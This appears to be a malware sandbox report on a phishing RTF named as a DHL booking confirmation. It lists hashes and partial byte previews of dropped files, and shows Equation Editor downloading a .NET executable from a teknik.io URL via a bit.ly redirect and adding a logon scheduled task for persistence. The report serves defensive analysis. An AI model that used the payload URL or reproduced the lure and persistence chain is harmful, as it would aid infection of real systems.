Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	893
Entropy (8bit):	7.366016576663508
Encrypted:	false
SSDEEP:	24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
MD5:	D4AE187B4574036C2D76B6DF8A8C1A30
SHA1:	B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256:	A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512:	1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0..y...H.........j0..f...1.0....H.........N0..J0..2.......D....'..09...@k0....H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0....H.............0..........P..W..be......,k0.[...}.@......3vI.?!I..N..>H.e...!.e..2....w..{........s.z..2..~..0....8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i.....)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0....H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..\|.Wv..(9..e...w.j..w.......)...55.1.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.082453199197871
Encrypted:	false
SSDEEP:	6:kKZlpbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:hlw3kPlE99SNxAhUeo+aKt
MD5:	91D8AD83CB8EF0AFD97E5321D62C5954
SHA1:	5FF9C2C6DED439EF4559D97B03FE494A3D43F1F6
SHA-256:	1AA7E8338C2DD6934B9CD685DF8A11437D2237793F6A12D8538AD0D7855263F7
SHA-512:	9602C93CC0E05A1FB72A7E0EE16F3E968D93A862426EBC3F75198389A4329B926CB4F4BE158CCB1958D68FCC25EDD964CBA3AC5691FFB98BC5E3D11BB9679453
Malicious:	false
Reputation:	low
Preview:	p...... .........H0=....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	252
Entropy (8bit):	3.0294634724686764
Encrypted:	false
SSDEEP:	3:kkFklaiHlXfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKXiHlJliBAIdQZV7eAYLit
MD5:	517B17724F90707F513C73FEF3A6D0D1
SHA1:	BC1D646870CF45349CEB32C226A5E591F2F7EE06
SHA-256:	A763C1A0EF0339B3BB4A98FA69155A0AF7923F1144787FAA219A43660B8D9626
SHA-512:	FFB7C2E81465A21D7551D0C9B4B7890B37F09910B16D534F29C42A28FD80B5022621C5CA7171F9C48343F07D87BFAD847EC2C074280DB8B5114B75856C17C1CD
Malicious:	false
Reputation:	low
Preview:	p...... ....`....V.=....(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\HOMqO[1].txt Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	766976
Entropy (8bit):	7.940274777998683
Encrypted:	false
SSDEEP:	12288:sEoF4lSePJI+f8Y+6I7MoPrYeAZDGfQ0lSzujpMEOoeYw3LLUEMthvoPTG16KL:GYPJnf876I7KTZDYizutM3oeLCsG16KL
MD5:	8C596990203F7D15651498FDBA84B5F3
SHA1:	BCABAE5C0B3CA8E9558AD3F57C3A10E8B5AE6F74
SHA-256:	A98A739B9AB7B06BF2833F6EF4AA97DB1B7C2441365C7104E878C8B29BF90F74
SHA-512:	1CBC6440FE45B66E5A72A41312B1195E25B64EDE5F97BFDE98CD9FDCABE30C9434FCEED40282D2453B7B25823AAEF7CB26F4D910E1EBA6FB95FB2A83D3968D93
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
IE Cache URL:	https://u.teknik.io/HOMqO.txt
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....5`..............0.................. ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Ho..p3......4........%..........................................&.(.........0..9........~.........,".r...p.....(....o....s............~.....+......0...........~.....+.."........0..!........(....r!..p~....o......t.....+......0..!........(....r1..p~....o......t.....+......0...........r5..p.+....0...........rA..p.+..".(.....^..}.....(.......(%.......(.......0..;........rQ..pr...p.(...........,..(......+..s......o .....(!.....*..0..I........r...pr...p.(.......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3kijui1[1].htm Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.586537953698698
Encrypted:	false
SSDEEP:	3:qVvzLURODccZ/vXbvx9nDyZHL+lHRMIkFSXbKFvNGb:qFzLIeco3XLx92ZHqjMIMSLWQb
MD5:	CBE7C488F40856500F96E7A2241E446C
SHA1:	D423F97F06B3DE1858963FB4C9DFC91C8903E583
SHA-256:	2C36C438DDE1A68205FCCD8AD61CA9FEC62445C6BCCEBD3CB7D2FF65721A4C92
SHA-512:	3D63AB45EA443FBAE45654F07FCCBB2F99DA9F68DE2AC93AD95CF8FC7C741792E7F22AC78CD9FCE44B73BD4B1439B15AA4162A92289A4F9568F22899D043B6B8
Malicious:	false
Reputation:	low
Preview:	<html>.<head><title>Bitly</title></head>.<body><a href="https://u.teknik.io/HOMqO.txt">moved here</a></body>.</html>

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7621A4C2-B642-4F8D-8632-93AA6D767CE8}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3586208805849456
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbS:IiiiiiiiiifdLloZQc8++lsJe1Mz5
MD5:	902213563D2195F9EFB916FFA17781F4
SHA1:	DF42BEC902D37E2350892716A046B7C68E784D4D
SHA-256:	8ABD0E4642BACA7D3EE404C48AF7E21DD219F823A8BFF5D00D3F2CF5346A662F
SHA-512:	F4E5C3667E8D1ED541AF894E2A28A31044A06A877C27E619FCA28AF36F889864D5342A928B8F2BF3529C71CEDE7BC113A6712E1CB7D436E0289BB032A4D6F439
Malicious:	false
Reputation:	low
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B5F6BABB-61BE-41BF-89DB-AF92964D1C77}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F060F5F7-4AFC-467A-BEBB-A714D3C0AD58}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	2662892
Entropy (8bit):	4.149677302216823
Encrypted:	false
SSDEEP:	49152:VOMiODiADi6DhODiOqiOCiODiO+pODiODY6DiODiLliODiOFFODiO6i8DiODNOk9:VtiyiMimhyiriDiyifpyiyYmiyipiyiE
MD5:	24CEA4BCB674A5118CE282F6762B389B
SHA1:	3BBF31B912CC878BD05D4E6001C130267D02DCA5
SHA-256:	63A8D9934C155B0F5871E965AB66EAF604DD97E055B5B333D79E5D96D1D4CA21
SHA-512:	B924C69B78E6B09104D442EF7F33BA2E4759003311EDC3320412041D15B19B0AE1F138788FB431C29628F18733AFF86DFB171FE106968A5B44AF20A969BFDBDF
Malicious:	false
Preview:	..@.A.p.J.n.b.S.m.E.I.k.B.Y.w.P.B.r.@.-.D.y.s.i.v.y.j.z.Z.m.o.I.e.C.P.i.F.<.e.h.&.&.0._.M.-.C._.g.-.-._.-.d.,.6.4.>.3.2.9.9.7.$.C.v.>.y.t.=.n.5.\|.:.%._.>.j.n.8.%.b.m.;.=.u...2.8..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . .

C:\Users\user\AppData\Local\Temp\Cab36BA.tmp Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\Local\Temp\Tar36BB.tmp Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	152788
Entropy (8bit):	6.316654432555028
Encrypted:	false
SSDEEP:	1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
MD5:	64FEDADE4387A8B92C120B21EC61E394
SHA1:	15A2673209A41CCA2BC3ADE90537FE676010A962
SHA-256:	BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
SHA-512:	655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
Malicious:	false
Preview:	0..T....H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Local\Temp\tmpA738.tmp Download File
Process:	C:\Users\Public\69577.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1625
Entropy (8bit):	5.152841578145327
Encrypted:	false
SSDEEP:	24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB5tn:cbhZ7ClNQi/rydbz9I3YODOLNdq3N
MD5:	5245C8FADF559EA119C2B4F0A9D0E959
SHA1:	AF3109524DF7E165CBB7438046D1770F84B312EC
SHA-256:	07D9EF78586F22DF3C195132D412ECDDE4041CBECF40EA8B93F7FEDBBADF0A7D
SHA-512:	933C89DB8D05C73F7FE2FA916B21DC64D26ABD29749A473D0C8BBAB372F41380343F00F634C7694A59D9DABE7905B9FAC45600B755FDAEF7EA6DFE7FF0F89ED7
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Wed Feb 24 19:53:30 2021, length=1380809, window=hide
Category:	dropped
Size (bytes):	2568
Entropy (8bit):	4.614979350110804
Encrypted:	false
SSDEEP:	48:8U+2/XT3Iknr6RMQh2U+2/XT3Iknr6RMQ/:8U+2/XLIk+RMQh2U+2/XLIk+RMQ/
MD5:	45856AD0800B606769734B9E179724CE
SHA1:	FA62F66A4BE7DFFAA55D5A37B36692D37D37204D
SHA-256:	C47FBE6840D5A83DDB91BE629F36E7E5F8B9065C8D6C145DCBC7D1314515D80A
SHA-512:	4B26A3C829BD05F7E3C9466FBEFB0BA084561B59004334AFA4223867F5BF9D5756729A52DF32651BF6265802095B502DECF07080CE5CE4BF520E7E4DFEA06622
Malicious:	false
Preview:	L..................F.... ...V.9..{..V.9..{...D..............................;....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....XR.. .DHL887~1.DOC..........Q.y.Q.y...8.....................D.H.L.8.8.7.0.0.4.5.6.X.X.X.X._.C.O.N.F.I.R.M.A.T.I.O.N._.B.O.O.K.I.N.G._.R.E.F.E.R.E.N.C.E._.B.J.C.4.0.0.6.1.8.0.9.2.9.0.9.y.y...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\494126\Users.user\Desktop\DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc.[.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.H.L.8.8.7.0.0.4.5.6.X.X.X.X._.C.O.N.F.I.R.M.A.T.I.O.N._.B.O.O.K.I.N.G._.R.E.F.E.R.E.N.C.E._.B.J.C.4.0.0.6.1.8.0.9.2.9.0.9.y.y..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	230
Entropy (8bit):	4.936063557817037
Encrypted:	false
SSDEEP:	6:M3r7SrwRwv2L5BA5Z7SrwRwv2L5Bvr7SrwRwv2L5Bs:M3Kcuv29BE4cuv29BvKcuv29Bs
MD5:	7C7F0F84BC6FC83DE18097FAF4BB388E
SHA1:	14383447FD949202E183667994DAEA8564C28726
SHA-256:	DADAF56E2CF5C8B6327649D93F5E5BBD9DD3DE00A6C00FAF230169A40EF020CE
SHA-512:	AEE284DB2044345C31DCD42C171289E9973D027CFC4E85F1E3143B51ED1DE6B5E908C5413DE7E780AEC7F2AE6AFF088F5DC8333EF71BE28B41DA5CA867ACC4B7
Malicious:	false
Preview:	[doc]..DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.LNK=0..DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.LNK=0..[doc]..DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ZEL5A6R0.txt Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	ASCII text
Category:	downloaded
Size (bytes):	90
Entropy (8bit):	4.382635874561578
Encrypted:	false
SSDEEP:	3:jvxVN/uGfWci2qidOVjkSyQ/:VVNBfWci2l6jkY
MD5:	DBAAC00B2E0F03C3853EA9B26115EBE0
SHA1:	F62014A05A1577AC5B4E059D45E332D41AA424FB
SHA-256:	175538754FBE648543573E2860F44A34C2D524140C260D2D020B4E1266336A0E
SHA-512:	2113A1FBA1233134D17B42473903A74EF0236EEC49D599226E54F661123E87D0541324036C1A8702886DB0E0D80158003036970F598FC96C7927D5CCE459FC3C
Malicious:	false
IE Cache URL:	bit.ly/
Preview:	_bit.l1obRp-93e7878892ed3a82aa-00m.bit.ly/.1536.2057545856.30906389.2314061830.30870255.*.

C:\Users\user\AppData\Roaming\xWdTBYiTWyTud.exe Download File
Process:	C:\Users\Public\69577.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	766976
Entropy (8bit):	7.940274777998683
Encrypted:	false
SSDEEP:	12288:sEoF4lSePJI+f8Y+6I7MoPrYeAZDGfQ0lSzujpMEOoeYw3LLUEMthvoPTG16KL:GYPJnf876I7KTZDYizutM3oeLCsG16KL
MD5:	8C596990203F7D15651498FDBA84B5F3
SHA1:	BCABAE5C0B3CA8E9558AD3F57C3A10E8B5AE6F74
SHA-256:	A98A739B9AB7B06BF2833F6EF4AA97DB1B7C2441365C7104E878C8B29BF90F74
SHA-512:	1CBC6440FE45B66E5A72A41312B1195E25B64EDE5F97BFDE98CD9FDCABE30C9434FCEED40282D2453B7B25823AAEF7CB26F4D910E1EBA6FB95FB2A83D3968D93
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....5`..............0.................. ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Ho..p3......4........%..........................................&.(.........0..9........~.........,".r...p.....(....o....s............~.....+......0...........~.....+.."........0..!........(....r!..p~....o......t.....+......0..!........(....r1..p~....o......t.....+......0...........r5..p.+....0...........rA..p.+..".(.....^..}.....(.......(%.......(.......0..;........rQ..pr...p.(...........,..(......+..s......o .....(!.....*..0..I........r...pr...p.(.......

C:\Users\user\Desktop\~$L88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\Public\69577.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	766976
Entropy (8bit):	7.940274777998683
Encrypted:	false
SSDEEP:	12288:sEoF4lSePJI+f8Y+6I7MoPrYeAZDGfQ0lSzujpMEOoeYw3LLUEMthvoPTG16KL:GYPJnf876I7KTZDYizutM3oeLCsG16KL
MD5:	8C596990203F7D15651498FDBA84B5F3
SHA1:	BCABAE5C0B3CA8E9558AD3F57C3A10E8B5AE6F74
SHA-256:	A98A739B9AB7B06BF2833F6EF4AA97DB1B7C2441365C7104E878C8B29BF90F74
SHA-512:	1CBC6440FE45B66E5A72A41312B1195E25B64EDE5F97BFDE98CD9FDCABE30C9434FCEED40282D2453B7B25823AAEF7CB26F4D910E1EBA6FB95FB2A83D3968D93
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....5`..............0.................. ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Ho..p3......4........%..........................................&.(.........0..9........~.........,".r...p.....(....o....s............~.....+......0...........~.....+.."........0..!........(....r!..p~....o......t.....+......0..!........(....r1..p~....o......t.....+......0...........r5..p.+....0...........rA..p.+..".(.....^..}.....(.......(%.......(.......0..;........rQ..pr...p.(...........,..(......+..s......o .....(!.....*..0..I........r...pr...p.(.......

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	6.3156947663805925
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc
File size:	1380809
MD5:	f89f2bb301dfc15a5c610356985cd85c
SHA1:	add01248aa7c1ec894e05398d1a46721fa3da986
SHA256:	072e26aacdd14b3210884f383ea0fa6705fc2f37661f8fb651d75dbf355b70aa
